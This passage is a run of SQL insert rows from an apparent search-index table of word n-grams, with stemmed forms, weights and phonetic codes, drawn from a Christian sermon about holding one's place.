(290946, 'of mind a', 'of mind a', 0, 1, 1.3, 'O153', 1, '*'),
(290947, 'of one of', 'of one of', 0, 1, 1.3, 'O151', 1, '*'),
(290948, 'of proverbs', 'of proverbs', 0, 1, 1.3667, 'O161612', 1, '*'),
(290949, 'of proverbs 27', 'of proverbs 27', 0, 1, 1.4667, 'O161612', 1, '*'),
(290950, 'of replacement', 'of replacement', 0, 1, 1.4667, 'O1614253', 1, '*'),
(290951, 'of replacement and', 'of replacement and', 0, 1, 1.6, 'O161425353', 1, '*'),
(290952, 'of the ground', 'of the ground', 0, 1, 1.4333, 'O132653', 1, '*'),
(290953, 'of vagabondary', 'of vagabondary', 0, 1, 1.4667, 'O121536', 1, '*'),
(290954, 'of vagabondary is', 'of vagabondary is', 0, 1, 1.5667, 'O1215362', 1, '*'),
(290955, 'of your place', 'of your place', 0, 1, 1.4333, 'O16142', 1, '*'),
(290956, 'ofyour', 'ofyour', 0, 0, 0.4, 'O160', 1, '*'),
(290957, 'ofyour place', 'ofyour place', 0, 1, 1.4, 'O16142', 1, '*'),
(290958, 'ofyour place stay', 'ofyour place stay', 0, 1, 1.5667, 'O161423', 1, '*'),
(290959, 'on a field', 'on a field', 0, 1, 1.3333, 'O5143', 1, '*'),
(290960, 'one of david\'s', 'on of david', 0, 1, 1.4667, 'O513132', 1, '*'),
(290961, 'or challenges your', 'or challenges your', 0, 1, 1.6, 'O624526', 1, '*'),
(290962, 'or even your', 'or even your', 0, 1, 1.4, 'O6156', 1, '*'),
(290963, 'or give in', 'or give in', 0, 1, 1.3333, 'O6215', 1, '*'),
(290964, 'ordained you to', 'ordain you to', 0, 1, 1.5, 'O6353', 1, '*'),
(290965, 'others fled', 'other fled', 0, 1, 1.3667, 'O362143', 1, '*'),
(290966, 'others fled but', 'other fled but', 0, 1, 1.5, 'O36214313', 1, '*'),
(290967, 'out of it\'s', 'out of it', 0, 1, 1.3667, 'O3132', 1, '*'),
(290968, 'out ofyour', 'out ofyour', 0, 1, 1.3333, 'O316', 1, '*'),
(290969, 'out ofyour place', 'out ofyour place', 0, 1, 1.5333, 'O316142', 1, '*'),
(290970, 'out your own', 'out your own', 0, 1, 1.4, 'O365', 1, '*'),
(290971, 'own place', 'own place', 0, 1, 1.3, 'O5142', 1, '*'),
(290972, 'own place and', 'own place and', 0, 1, 1.4333, 'O514253', 1, '*'),
(290973, 'own place is', 'own place is', 0, 1, 1.4, 'O5142', 1, '*'),
(290974, 'pastor stand', 'pastor stand', 0, 1, 1.4, 'P2362353', 1, '*'),
(290975, 'pastor stand your', 'pastor stand your', 0, 1, 1.5667, 'P23623536', 1, '*'),
(290976, 'philistines', 'philistin', 0, 0, 0.7333, 'P42352', 1, '*'),
(290977, 'philistines and', 'philistin and', 0, 1, 1.5, 'P4235253', 1, '*'),
(290978, 'philistines and the', 'philistin and the', 0, 1, 1.6333, 'P4235253', 1, '*'),
(290979, 'philistines came', 'philistin came', 0, 1, 1.5333, 'P423525', 1, '*'),
(290980, 'philistines came against', 'philistin came against', 0, 1, 1.8, 'P4235252523', 1, '*'),
(290981, 'place and', 'place and', 0, 1, 1.3, 'P4253', 4, '*'),
(290982, 'place and see', 'place and see', 0, 1, 1.4333, 'P42532', 1, '*'),
(290983, 'place and stand', 'place and stand', 0, 1, 1.5, 'P42532353', 1, '*'),
(290984, 'place and stay', 'place and stay', 0, 1, 1.4667, 'P425323', 1, '*'),
(290985, 'place and today', 'place and today', 0, 1, 1.5, 'P4253', 1, '*'),
(290986, 'place called', 'place called', 0, 1, 1.4, 'P4243', 1, '*'),
(290987, 'place called \'your', 'place called your', 0, 1, 1.6, 'P42436', 1, '*'),
(290988, 'place could', 'place could', 0, 1, 1.3667, 'P4243', 1, '*'),
(290989, 'place could mean', 'place could mean', 0, 1, 1.5333, 'P42435', 1, '*'),
(290990, 'place demas', 'place demas', 0, 1, 1.3667, 'P42352', 1, '*'),
(290991, 'place demas john', 'place demas john', 0, 1, 1.5333, 'P423525', 1, '*'),
(290992, 'place determine', 'place determine', 0, 1, 1.5, 'P42365', 1, '*'),
(290993, 'place determine to', 'place determine to', 0, 1, 1.6, 'P423653', 1, '*'),
(290994, 'place don\'t', 'place don', 0, 1, 1.3667, 'P42353', 1, '*'),
(290995, 'place don\'t get', 'place don get', 0, 1, 1.5, 'P4235323', 1, '*'),
(290996, 'place don\'t let', 'place don let', 0, 1, 1.5, 'P4235343', 1, '*'),
(290997, 'place for', 'place for', 0, 1, 1.3, 'P4216', 1, '*'),
(290998, 'place for you', 'place for you', 0, 1, 1.4333, 'P4216', 1, '*'),
(290999, 'place god', 'place god', 0, 1, 1.3, 'P423', 1, '*'),
(291000, 'place god has', 'place god has', 0, 1, 1.4333, 'P4232', 1, '*'),
(291001, 'place hold', 'place hold', 0, 1, 1.3333, 'P4243', 1, '*'),
(291002, 'place hold your', 'place hold your', 0, 1, 1.5, 'P42436', 1, '*'),
(291003, 'place is', 'place is', 0, 1, 1.2667, 'P420', 1, '*'),
(291004, 'place is the', 'place is the', 0, 1, 1.4, 'P423', 1, '*'),
(291005, 'place king', 'place king', 0, 1, 1.3333, 'P4252', 1, '*'),
(291006, 'place king saul', 'place king saul', 0, 1, 1.5, 'P42524', 1, '*'),
(291007, 'place lucifer', 'place lucifer', 0, 1, 1.4333, 'P424216', 1, '*'),
(291008, 'place lucifer left', 'place lucifer left', 0, 1, 1.6, 'P424216413', 1, '*'),
(291009, 'place stay', 'place stay', 0, 1, 1.3333, 'P423', 1, '*'),
(291010, 'place stay in', 'place stay in', 0, 1, 1.4333, 'P4235', 1, '*'),
(291011, 'place the', 'place the', 0, 1, 1.3, 'P423', 1, '*'),
(291012, 'place the lord', 'place the lord', 0, 1, 1.4667, 'P423463', 1, '*'),
(291013, 'place there', 'place there', 0, 1, 1.3667, 'P4236', 1, '*'),
(291014, 'place there is', 'place there is', 0, 1, 1.4667, 'P42362', 1, '*'),
(291015, 'place there will', 'place there will', 0, 1, 1.5333, 'P42364', 1, '*'),
(291016, 'place till', 'place till', 0, 1, 1.3333, 'P4234', 1, '*'),
(291017, 'place till next', 'place till next', 0, 1, 1.5, 'P4234523', 1, '*'),
(291018, 'place vashti', 'place vashti', 0, 1, 1.4, 'P42123', 1, '*'),
(291019, 'place vashti left', 'place vashti left', 0, 1, 1.5667, 'P42123413', 1, '*'),
(291020, 'place wife', 'place wife', 0, 1, 1.3333, 'P421', 1, '*'),
(291021, 'place wife keep', 'place wife keep', 0, 1, 1.5, 'P42121', 1, '*'),
(291022, 'place your', 'place your', 0, 1, 1.3333, 'P426', 1, '*'),
(291023, 'place your place', 'place your place', 0, 1, 1.5333, 'P426142', 1, '*'),
(291024, 'place\',', 'place', 0, 0, 0.4667, 'P420', 1, '*'),
(291025, 'places and', 'place and', 0, 1, 1.3333, 'P4253', 1, '*'),
(291026, 'places and remain', 'place and remain', 0, 1, 1.5667, 'P425365', 1, '*'),
(291027, 'places in', 'place in', 0, 1, 1.3, 'P425', 1, '*'),
(291028, 'places in god', 'place in god', 0, 1, 1.4333, 'P42523', 1, '*'),
(291029, 'popular trend', 'popular trend', 0, 1, 1.4333, 'P463653', 1, '*'),
(291030, 'popular trend is', 'popular trend is', 0, 1, 1.5333, 'P4636532', 1, '*'),
(291031, 'position your', 'posit your', 0, 1, 1.4333, 'P2356', 1, '*'),
(291032, 'position your role', 'posit your role', 0, 1, 1.6, 'P23564', 1, '*'),
(291033, 'posturing', 'postur', 0, 0, 0.6, 'P23652', 1, '*'),
(291034, 'posturing whatever', 'postur whatever', 0, 1, 1.6, 'P23652316', 1, '*'),
(291035, 'posturing whatever it', 'postur whatever it', 0, 1, 1.7, 'P236523163', 1, '*'),
(291036, 'powerfully', 'powerfulli', 0, 0, 0.6667, 'P614', 1, '*'),
(291037, 'powerfully without', 'powerfulli without', 0, 1, 1.6, 'P6143', 1, '*'),
(291038, 'powerfully without compromising', 'powerfulli without compromising', 0, 1, 2, 'P614325165252', 1, '*'),
(291039, 'prodigal', 'prodig', 0, 0, 0.5333, 'P6324', 1, '*'),
(291040, 'prodigal son', 'prodig son', 0, 1, 1.4, 'P632425', 1, '*'),
(291041, 'prodigal son adonija', 'prodig son adonija', 0, 1, 1.6667, 'P632425352', 1, '*'),
(291042, 'prosper and', 'prosper and', 0, 1, 1.3667, 'P621653', 1, '*'),
(291043, 'prosper and flourish', 'prosper and flourish', 0, 1, 1.6667, 'P6216531462', 1, '*'),
(291044, 'prosper hold', 'prosper hold', 0, 1, 1.4, 'P621643', 1, '*'),
(291045, 'prosper hold your', 'prosper hold your', 0, 1, 1.5667, 'P6216436', 1, '*'),
(291046, 'proverbs 27', 'proverb 27', 0, 1, 1.3667, 'P61612', 1, '*'),
(291047, 'proverbs 27 8', 'proverb 27 8', 0, 1, 1.4333, 'P61612', 1, '*'),
(291048, 'punishment', 'punish', 0, 0, 0.6667, 'P5253', 1, '*'),
(291049, 'punishment with', 'punish with', 0, 1, 1.5, 'P5253', 1, '*'),
(291050, 'punishment with his', 'punish with his', 0, 1, 1.6333, 'P52532', 1, '*'),
(291051, 'ready to back', 'readi to back', 0, 1, 1.4333, 'R312', 1, '*'),
(291052, 'remain there strongly', 'remain there strongly', 0, 1, 1.7, 'R536236524', 1, '*'),
(291053, 'replacement and', 'replac and', 0, 1, 1.5, 'R1425353', 1, '*'),
(291054, 'replacement and displacement', 'replac and displacement', 0, 1, 1.9333, 'R1425353214253', 1, '*'),
(291055, 'role in', 'role in', 0, 1, 1.2333, 'R450', 1, '*'),
(291056, 'role in ministry', 'role in ministry', 0, 1, 1.5333, 'R45236', 1, '*'),
(291057, 'said in verse', 'said in verse', 0, 1, 1.4333, 'S35162', 1, '*'),
(291058, 'samuel 23', 'samuel 23', 0, 1, 1.3, 'S540', 1, '*'),
(291059, 'samuel 23 9', 'samuel 23 9', 0, 1, 1.3667, 'S540', 1, '*'),
(291060, 'saul left', 'saul left', 0, 1, 1.3, 'S413', 1, '*'),
(291061, 'saul left his', 'saul left his', 0, 1, 1.4333, 'S4132', 1, '*'),
(291062, 'says in the', 'sai in the', 0, 1, 1.3667, 'S530', 1, '*'),
(291063, 'scripture talks', 'scriptur talks', 0, 1, 1.5, 'S6136342', 1, '*'),
(291064, 'scripture talks of', 'scriptur talks of', 0, 1, 1.6, 'S61363421', 1, '*'),
(291065, 'see glorious', 'see glorious', 0, 1, 1.4, 'S462', 1, '*'),
(291066, 'see glorious things', 'see glorious things', 0, 1, 1.6333, 'S462352', 1, '*'),
(291067, 'seek out', 'seek out', 0, 1, 1.2667, 'S300', 1, '*'),
(291068, 'seek out your', 'seek out your', 0, 1, 1.4333, 'S360', 1, '*'),
(291069, 'shammar', 'shammar', 0, 0, 0.4667, 'S560', 1, '*'),
(291070, 'shammar the', 'shammar the', 0, 1, 1.3667, 'S563', 1, '*'),
(291071, 'shammar the son', 'shammar the son', 0, 1, 1.5, 'S56325', 1, '*'),
(291072, 'slew', 'slew', 0, 0, 0.2667, 'S400', 1, '*'),
(291073, 'slew the', 'slew the', 0, 1, 1.2667, 'S430', 1, '*'),
(291074, 'slew the philistines', 'slew the philistines', 0, 1, 1.6667, 'S43142352', 1, '*'),
(291075, 'so is a', 'so is a', 0, 1, 1.2333, 'S000', 1, '*'),
(291076, 'son adonija', 'son adonija', 0, 1, 1.3667, 'S5352', 1, '*'),
(291077, 'son adonija absalom', 'son adonija absalom', 0, 1, 1.6333, 'S53521245', 1, '*'),
(291078, 'son don\'t', 'son don', 0, 1, 1.3, 'S5353', 1, '*'),
(291079, 'son don\'t try', 'son don try', 0, 1, 1.4333, 'S53536', 1, '*'),
(291080, 'son keep', 'son keep', 0, 1, 1.2667, 'S521', 1, '*'),
(291081, 'son keep being', 'son keep being', 0, 1, 1.4667, 'S52152', 1, '*'),
(291082, 'son of agee', 'son of agee', 0, 1, 1.3667, 'S512', 1, '*'),
(291083, 'sow in', 'sow in', 0, 1, 1.2, 'S500', 1, '*'),
(291084, 'sow in your', 'sow in your', 0, 1, 1.3667, 'S560', 1, '*'),
(291085, 'sowed', 'sow', 0, 0, 0.3333, 'S300', 1, '*'),
(291086, 'sowed in', 'sow in', 0, 1, 1.2667, 'S350', 1, '*'),
(291087, 'sowed in the', 'sow in the', 0, 1, 1.4, 'S353', 1, '*'),
(291088, 'stand their', 'stand their', 0, 1, 1.3667, 'S3536', 1, '*'),
(291089, 'stand their ground', 'stand their ground', 0, 1, 1.6, 'S35362653', 1, '*'),
(291090, 'stand your', 'stand your', 0, 1, 1.3333, 'S3536', 1, '*'),
(291091, 'stand your ground', 'stand your ground', 0, 1, 1.5667, 'S35362653', 1, '*'),
(291092, 'state of heart', 'state of heart', 0, 1, 1.4667, 'S3163', 1, '*'),
(291093, 'stay in their', 'stai in their', 0, 1, 1.4333, 'S3536', 1, '*'),
(291094, 'stay in your', 'stai in your', 0, 1, 1.4, 'S356', 1, '*'),
(291095, 'stay there', 'stai there', 0, 1, 1.3333, 'S360', 1, '*'),
(291096, 'stay there no', 'stai there no', 0, 1, 1.4333, 'S365', 1, '*'),
(291097, 'stayed', 'stai', 0, 0, 0.4, 'S300', 1, '*'),
(291098, 'stayed in', 'stai in', 0, 1, 1.3, 'S350', 1, '*'),
(291099, 'stayed in his', 'stai in his', 0, 1, 1.4333, 'S352', 1, '*'),
(291100, 'stood his', 'stood his', 0, 1, 1.3, 'S320', 1, '*'),
(291101, 'stood his ground', 'stood his ground', 0, 1, 1.5333, 'S32653', 1, '*'),
(291102, 'stood in', 'stood in', 0, 1, 1.2667, 'S350', 1, '*'),
(291103, 'stood in the', 'stood in the', 0, 1, 1.4, 'S353', 1, '*'),
(291104, 'strong and prosper', 'strong and prosper', 0, 1, 1.6, 'S36525316216', 1, '*'),
(291105, 'strongly', 'strongli', 0, 0, 0.5333, 'S36524', 1, '*'),
(291106, 'strongly forcefully', 'strongli forcefully', 0, 1, 1.6333, 'S3652416214', 1, '*'),
(291107, 'strongly forcefully powerfully', 'strongli forcefully powerfully', 0, 1, 2, 'S36524162141614', 1, '*'),
(291108, 'struck', 'struck', 0, 0, 0.4, 'S362', 1, '*'),
(291109, 'struck and', 'struck and', 0, 1, 1.3333, 'S36253', 1, '*'),
(291110, 'struck and he', 'struck and he', 0, 1, 1.4333, 'S36253', 1, '*'),
(291111, 'take their', 'take their', 0, 1, 1.3333, 'T236', 1, '*'),
(291112, 'take their places', 'take their places', 0, 1, 1.5667, 'T236142', 1, '*'),
(291113, 'talks of one', 'talk of one', 0, 1, 1.4, 'T4215', 1, '*'),
(291114, 'that wanders', 'that wanders', 0, 1, 1.4, 'T5362', 1, '*'),
(291115, 'that wanders out', 'that wanders out', 0, 1, 1.5333, 'T53623', 1, '*'),
(291116, 'the best place', 'the best place', 0, 1, 1.4667, 'T123142', 1, '*'),
(291117, 'the book', 'the book', 0, 1, 1.2667, 'T120', 2, '*'),
(291118, 'the book of', 'the book of', 0, 1, 1.3667, 'T121', 2, '*'),
(291119, 'the enemy the', 'the enemy the', 0, 1, 1.4333, 'T530', 1, '*'),
(291120, 'the ground', 'the ground', 0, 1, 1.3333, 'T2653', 1, '*'),
(291121, 'the ground and', 'the ground and', 0, 1, 1.4667, 'T265353', 1, '*'),
(291122, 'the hardship', 'the hardship', 0, 1, 1.4, 'T6321', 1, '*'),
(291123, 'the hardship or', 'the hardship or', 0, 1, 1.5, 'T63216', 1, '*'),
(291124, 'the land where', 'the land where', 0, 1, 1.4667, 'T4536', 2, '*'),
(291125, 'the lordwrought', 'the lordwrought', 0, 1, 1.5, 'T463623', 1, '*'),
(291126, 'the lordwrought a', 'the lordwrought a', 0, 1, 1.5667, 'T463623', 1, '*'),
(291127, 'the new year', 'the new year', 0, 1, 1.4, 'T560', 1, '*'),
(291128, 'the philistines', 'the philistines', 0, 1, 1.5, 'T142352', 1, '*'),
(291129, 'the philistines and', 'the philistines and', 0, 1, 1.6333, 'T14235253', 1, '*'),
(291130, 'the philistines came', 'the philistines came', 0, 1, 1.6667, 'T1423525', 1, '*'),
(291131, 'the popular', 'the popular', 0, 1, 1.3667, 'T146', 1, '*'),
(291132, 'the popular trend', 'the popular trend', 0, 1, 1.5667, 'T1463653', 1, '*'),
(291133, 'the prodigal', 'the prodigal', 0, 1, 1.4, 'T16324', 1, '*'),
(291134, 'the prodigal son', 'the prodigal son', 0, 1, 1.5333, 'T1632425', 1, '*'),
(291135, 'the scripture talks', 'the scripture talks', 0, 1, 1.6333, 'T26136342', 1, '*'),
(291136, 'the trend', 'the trend', 0, 1, 1.3, 'T653', 1, '*'),
(291137, 'the trend seek', 'the trend seek', 0, 1, 1.4667, 'T6532', 1, '*'),
(291138, 'their ground', 'their ground', 0, 1, 1.4, 'T62653', 1, '*'),
(291139, 'their ground even', 'their ground even', 0, 1, 1.5667, 'T6265315', 1, '*'),
(291140, 'their place and', 'their place and', 0, 1, 1.5, 'T614253', 1, '*'),
(291141, 'their places', 'their places', 0, 1, 1.4, 'T6142', 1, '*'),
(291142, 'their places and', 'their places and', 0, 1, 1.5333, 'T614253', 1, '*'),
(291143, 'their places in', 'their places in', 0, 1, 1.5, 'T61425', 1, '*'),
(291144, 'there no matter', 'there no matter', 0, 1, 1.5, 'T6536', 1, '*'),
(291145, 'there strongly', 'there strongly', 0, 1, 1.4667, 'T6236524', 1, '*'),
(291146, 'there strongly forcefully', 'there strongly forcefully', 0, 1, 1.8333, 'T623652416214', 1, '*'),
(291147, 'they left', 'thei left', 0, 1, 1.3, 'T413', 1, '*'),
(291148, 'they left his', 'thei left his', 0, 1, 1.4333, 'T4132', 1, '*'),
(291149, 'things happen for', 'thing happen for', 0, 1, 1.5667, 'T521516', 1, '*'),
(291150, 'till next year', 'till next year', 0, 1, 1.4667, 'T45236', 1, '*'),
(291151, 'to back', 'to back', 0, 1, 1.2333, 'T120', 1, '*'),
(291152, 'to back up', 'to back up', 0, 1, 1.3333, 'T121', 1, '*'),
(291153, 'to be kicked', 'to be kicked', 0, 1, 1.4, 'T123', 1, '*'),
(291154, 'to encourage', 'to encourage', 0, 1, 1.4, 'T5262', 1, '*'),
(291155, 'to encourage you', 'to encourage you', 0, 1, 1.5333, 'T5262', 1, '*'),
(291156, 'to eternal', 'to eternal', 0, 1, 1.3333, 'T654', 1, '*'),
(291157, 'to eternal punishment', 'to eternal punishment', 0, 1, 1.7, 'T65415253', 1, '*'),
(291158, 'to grow strong', 'to grow strong', 0, 1, 1.4667, 'T2623652', 1, '*'),
(291159, 'to prosper', 'to prosper', 0, 1, 1.3333, 'T16216', 1, '*'),
(291160, 'to prosper and', 'to prosper and', 0, 1, 1.4667, 'T1621653', 1, '*'),
(291161, 'to stay in', 'to stay in', 0, 1, 1.3333, 'T235', 1, '*'),
(291162, 'to usurp', 'to usurp', 0, 1, 1.2667, 'T261', 1, '*'),
(291163, 'to usurp your', 'to usurp your', 0, 1, 1.4333, 'T2616', 1, '*'),
(291164, 'to you don\'t', 'to you don', 0, 1, 1.4, 'T530', 1, '*'),
(291165, 'to you isaac', 'to you isaac', 0, 1, 1.4, 'T200', 1, '*'),
(291166, 'today he', 'todai he', 0, 1, 1.2667, 'T000', 1, '*'),
(291167, 'today he has', 'todai he has', 0, 1, 1.4, 'T200', 1, '*'),
(291168, 'trend', 'trend', 0, 0, 0.3333, 'T653', 1, '*'),
(291169, 'trend is', 'trend is', 0, 1, 1.2667, 'T6532', 1, '*'),
(291170, 'trend is contrary', 'trend is contrary', 0, 1, 1.5667, 'T6532536', 1, '*'),
(291171, 'trend seek', 'trend seek', 0, 1, 1.3333, 'T6532', 1, '*'),
(291172, 'trend seek out', 'trend seek out', 0, 1, 1.4667, 'T65323', 1, '*'),
(291173, 'try to usurp', 'try to usurp', 0, 1, 1.4, 'T63261', 1, '*'),
(291174, 'up men', 'up men', 0, 1, 1.2, 'U150', 1, '*'),
(291175, 'up men and', 'up men and', 0, 1, 1.3333, 'U153', 1, '*'),
(291176, 'up or', 'up or', 0, 1, 1.1667, 'U160', 1, '*'),
(291177, 'up or give', 'up or give', 0, 1, 1.3333, 'U1621', 1, '*'),
(291178, 'usurp', 'usurp', 0, 0, 0.3333, 'U261', 1, '*'),
(291179, 'usurp your', 'usurp your', 0, 1, 1.3333, 'U2616', 1, '*'),
(291180, 'usurp your fathers', 'usurp your fathers', 0, 1, 1.6, 'U26161362', 1, '*'),
(291181, 'vagabondary', 'vagabondari', 0, 0, 0.7333, 'V21536', 1, '*'),
(291182, 'vagabondary is', 'vagabondari is', 0, 1, 1.4667, 'V215362', 1, '*'),
(291183, 'vagabondary is leaving', 'vagabondari is leaving', 0, 1, 1.7333, 'V2153624152', 1, '*'),
(291184, 'vashti', 'vashti', 0, 0, 0.4, 'V230', 2, '*'),
(291185, 'vashti left', 'vashti left', 0, 1, 1.3667, 'V23413', 1, '*'),
(291186, 'vashti left her', 'vashti left her', 0, 1, 1.5, 'V234136', 1, '*'),
(291187, 'verse 12 but', 'vers 12 but', 0, 1, 1.4, 'V6213', 1, '*'),
(291188, 'victory heaven', 'victori heaven', 0, 1, 1.4667, 'V23615', 1, '*'),
(291189, 'victory heaven is', 'victori heaven is', 0, 1, 1.5667, 'V236152', 1, '*'),
(291190, 'wanders', 'wander', 0, 0, 0.4667, 'W5362', 1, '*'),
(291191, 'wanders out', 'wander out', 0, 1, 1.3667, 'W53623', 1, '*'),
(291192, 'wanders out of', 'wander out of', 0, 1, 1.4667, 'W536231', 1, '*'),
(291193, 'want to encourage', 'want to encourage', 0, 1, 1.5667, 'W535262', 1, '*'),
(291194, 'we move into', 'we move into', 0, 1, 1.4, 'W5153', 1, '*'),
(291195, 'whatever it', 'whatev it', 0, 1, 1.3667, 'W3163', 1, '*'),
(291196, 'whatever it means', 'whatev it means', 0, 1, 1.5667, 'W316352', 1, '*'),
(291197, 'when the philistines', 'when the philistines', 0, 1, 1.6667, 'W53142352', 1, '*'),
(291198, 'where famine', 'where famine', 0, 1, 1.4, 'W615', 1, '*'),
(291199, 'where famine struck', 'where famine struck', 0, 1, 1.6333, 'W6152362', 1, '*'),
(291200, 'who held', 'who held', 0, 1, 1.2667, 'W430', 1, '*'),
(291201, 'who held his', 'who held his', 0, 1, 1.4, 'W432', 1, '*'),
(291202, 'who stay', 'who stay', 0, 1, 1.2667, 'W230', 1, '*'),
(291203, 'who stay in', 'who stay in', 0, 1, 1.3667, 'W235', 1, '*'),
(291204, 'who wanders', 'who wanders', 0, 1, 1.3667, 'W5362', 1, '*'),
(291205, 'who wanders out', 'who wanders out', 0, 1, 1.5, 'W53623', 1, '*'),
(291206, 'who will take', 'who will take', 0, 1, 1.4333, 'W432', 1, '*'),
(291207, 'wife keep', 'wife keep', 0, 1, 1.3, 'W121', 1, '*'),
(291208, 'wife keep being', 'wife keep being', 0, 1, 1.5, 'W12152', 1, '*'),
(291209, 'will be battles', 'will be battles', 0, 1, 1.5, 'W41342', 1, '*'),
(291210, 'will take their', 'will take their', 0, 1, 1.5, 'W43236', 1, '*'),
(291211, 'with his angels', 'with his angels', 0, 1, 1.5, 'W325242', 1, '*'),
(291212, 'with the trend', 'with the trend', 0, 1, 1.4667, 'W3653', 1, '*'),
(291213, 'without compromising', 'without compromising', 0, 1, 1.6667, 'W325165252', 1, '*'),
(291214, 'without compromising the', 'without compromising the', 0, 1, 1.8, 'W3251652523', 1, '*'),
(291215, 'women who', 'women who', 0, 1, 1.3, 'W500', 1, '*'),
(291216, 'women who stay', 'women who stay', 0, 1, 1.4667, 'W523', 1, '*'),
(291217, 'women who will', 'women who will', 0, 1, 1.4667, 'W540', 1, '*'),
(291218, 'work sow', 'work sow', 0, 1, 1.2667, 'W620', 1, '*'),
(291219, 'work sow in', 'work sow in', 0, 1, 1.3667, 'W625', 1, '*'),
(291220, 'year for', 'year for', 0, 1, 1.2667, 'Y616', 1, '*'),
(291221, 'year for men', 'year for men', 0, 1, 1.4, 'Y6165', 1, '*'),
(291222, 'year go', 'year go', 0, 1, 1.2333, 'Y620', 1, '*'),
(291223, 'year go and', 'year go and', 0, 1, 1.3667, 'Y6253', 1, '*'),
(291224, 'year i', 'year i', 0, 1, 1.2, 'Y600', 2, '*'),
(291225, 'year i want', 'year i want', 0, 1, 1.3667, 'Y653', 1, '*'),
(291226, 'yielded', 'yield', 0, 0, 0.4667, 'Y430', 1, '*'),
(291227, 'yielded harvest', 'yield harvest', 0, 1, 1.5, 'Y436123', 1, '*'),
(291228, 'yielded harvest in', 'yield harvest in', 0, 1, 1.6, 'Y4361235', 1, '*'),
(291229, 'you and to', 'you and to', 0, 1, 1.3333, 'Y530', 1, '*'),
(291230, 'you don\'t leave', 'you don leave', 0, 1, 1.5, 'Y35341', 1, '*'),
(291231, 'you isaac', 'you isaac', 0, 1, 1.3, 'Y200', 1, '*'),
(291232, 'you isaac sowed', 'you isaac sowed', 0, 1, 1.5, 'Y230', 1, '*'),
(291233, 'you made', 'you made', 0, 1, 1.2667, 'Y530', 1, '*'),
(291234, 'you made it', 'you made it', 0, 1, 1.3667, 'Y530', 1, '*'),
(291235, 'you must stay', 'you must stay', 0, 1, 1.4333, 'Y52323', 1, '*'),
(291236, 'you out ofyour', 'you out ofyour', 0, 1, 1.4667, 'Y316', 1, '*'),
(291237, 'you stay', 'you stay', 0, 1, 1.2667, 'Y230', 1, '*'),
(291238, 'you stay in', 'you stay in', 0, 1, 1.3667, 'Y235', 1, '*'),
(291239, 'you to grow', 'you to grow', 0, 1, 1.3667, 'Y326', 1, '*'),
(291240, 'you to prosper', 'you to prosper', 0, 1, 1.4667, 'Y316216', 1, '*'),
(291241, 'young lady', 'young lady', 0, 1, 1.3333, 'Y5243', 1, '*'),
(291242, 'young lady stand', 'young lady stand', 0, 1, 1.5333, 'Y52432353', 1, '*'),
(291243, 'young man', 'young man', 0, 1, 1.3, 'Y525', 1, '*'),
(291244, 'young man young', 'young man young', 0, 1, 1.5, 'Y5252', 1, '*'),
(291245, 'your assignments', 'your assignments', 0, 1, 1.5333, 'Y62532', 1, '*'),
(291246, 'your assignments or', 'your assignments or', 0, 1, 1.6333, 'Y625326', 1, '*'),
(291247, 'your fathers', 'your fathers', 0, 1, 1.4, 'Y61362', 1, '*'),
(291248, 'your fathers place', 'your fathers place', 0, 1, 1.6, 'Y61362142', 1, '*'),
(291249, 'your ground', 'your ground', 0, 1, 1.3667, 'Y62653', 1, '*'),
(291250, 'your ground don\'t', 'your ground don', 0, 1, 1.5667, 'Y6265353', 1, '*'),
(291251, 'your ground for', 'your ground for', 0, 1, 1.5, 'Y6265316', 1, '*'),
(291252, 'your ground labor', 'your ground labor', 0, 1, 1.5667, 'Y62653416', 1, '*'),
(291253, 'your own place', 'your own place', 0, 1, 1.4667, 'Y65142', 1, '*'),
(291254, 'your place and', 'your place and', 0, 1, 1.4667, 'Y614253', 1, '*'),
(291255, 'your place could', 'your place could', 0, 1, 1.5333, 'Y614243', 1, '*'),
(291256, 'your place determine', 'your place determine', 0, 1, 1.6667, 'Y6142365', 1, '*'),
(291257, 'your place don\'t', 'your place don', 0, 1, 1.5333, 'Y6142353', 1, '*'),
(291258, 'your place god', 'your place god', 0, 1, 1.4667, 'Y61423', 1, '*'),
(291259, 'your place hold', 'your place hold', 0, 1, 1.5, 'Y614243', 1, '*'),
(291260, 'your place lucifer', 'your place lucifer', 0, 1, 1.6, 'Y61424216', 1, '*'),
(291261, 'your place the', 'your place the', 0, 1, 1.4667, 'Y61423', 1, '*'),
(291262, 'your place there', 'your place there', 0, 1, 1.5333, 'Y614236', 1, '*'),
(291263, 'your place till', 'your place till', 0, 1, 1.5, 'Y614234', 1, '*'),
(291264, 'your place your', 'your place your', 0, 1, 1.5, 'Y61426', 1, '*'),
(291265, 'your posturing', 'your posturing', 0, 1, 1.4667, 'Y6123652', 1, '*'),
(291266, 'your posturing whatever', 'your posturing whatever', 0, 1, 1.7667, 'Y6123652316', 1, '*'),
(291267, 'your role', 'your role', 0, 1, 1.3, 'Y640', 1, '*'),
(291268, 'your role in', 'your role in', 0, 1, 1.4, 'Y645', 1, '*'),
(291575, '01 2016', '01 2016', 0, 1, 1.2333, '', 1, '*'),
(291576, '08', '08', 0, 0, 0.2, '', 4, '*'),
(291577, '08 01', '08 01', 0, 1, 1.1667, '', 1, '*'),
(291578, '08 01 2016', '08 01 2016', 0, 1, 1.3333, '', 1, '*'),
(291579, '08 01 2017', '08 01 2017', 0, 1, 1.3333, '', 1, '*'),
(291580, '13 and', '13 and', 0, 1, 1.2, 'A530', 1, '*'),
(291581, '13 and 14', '13 and 14', 0, 1, 1.3, 'A530', 1, '*'),
(291582, '13 father', '13 father', 0, 1, 1.3, 'F360', 1, '*'),
(291583, '13 father s', '13 father s', 0, 1, 1.3667, 'F362', 1, '*'),
(291584, '14 caleb', '14 caleb', 0, 1, 1.2667, 'C410', 1, '*'),
(291585, '14 caleb and', '14 caleb and', 0, 1, 1.4, 'C4153', 1, '*'),
(291586, '2016', '2016', 0, 0, 0.4, '', 1, '*'),
(291587, '2017 ask', '2017 ask', 0, 1, 1.2667, 'A200', 1, '*'),
(291588, '2017 ask for', '2017 ask for', 0, 1, 1.4, 'A216', 1, '*'),
(291589, '2017 don\'t', '2017 don', 0, 1, 1.3333, 'D530', 1, '*'),
(291590, '2017 don\'t ask', '2017 don ask', 0, 1, 1.4667, 'D532', 1, '*'),
(291591, '2017 mercy', '2017 mercy', 0, 1, 1.3333, 'M620', 1, '*'),
(291592, '2017 mercy the', '2017 mercy the', 0, 1, 1.4667, 'M623', 1, '*'),
(291593, '2017 this', '2017 this', 0, 1, 1.3, 'T200', 1, '*'),
(291594, '2017 this year', '2017 this year', 0, 1, 1.4667, 'T260', 1, '*'),
(291595, 'a bold', 'a bold', 0, 1, 1.2, 'A143', 1, '*'),
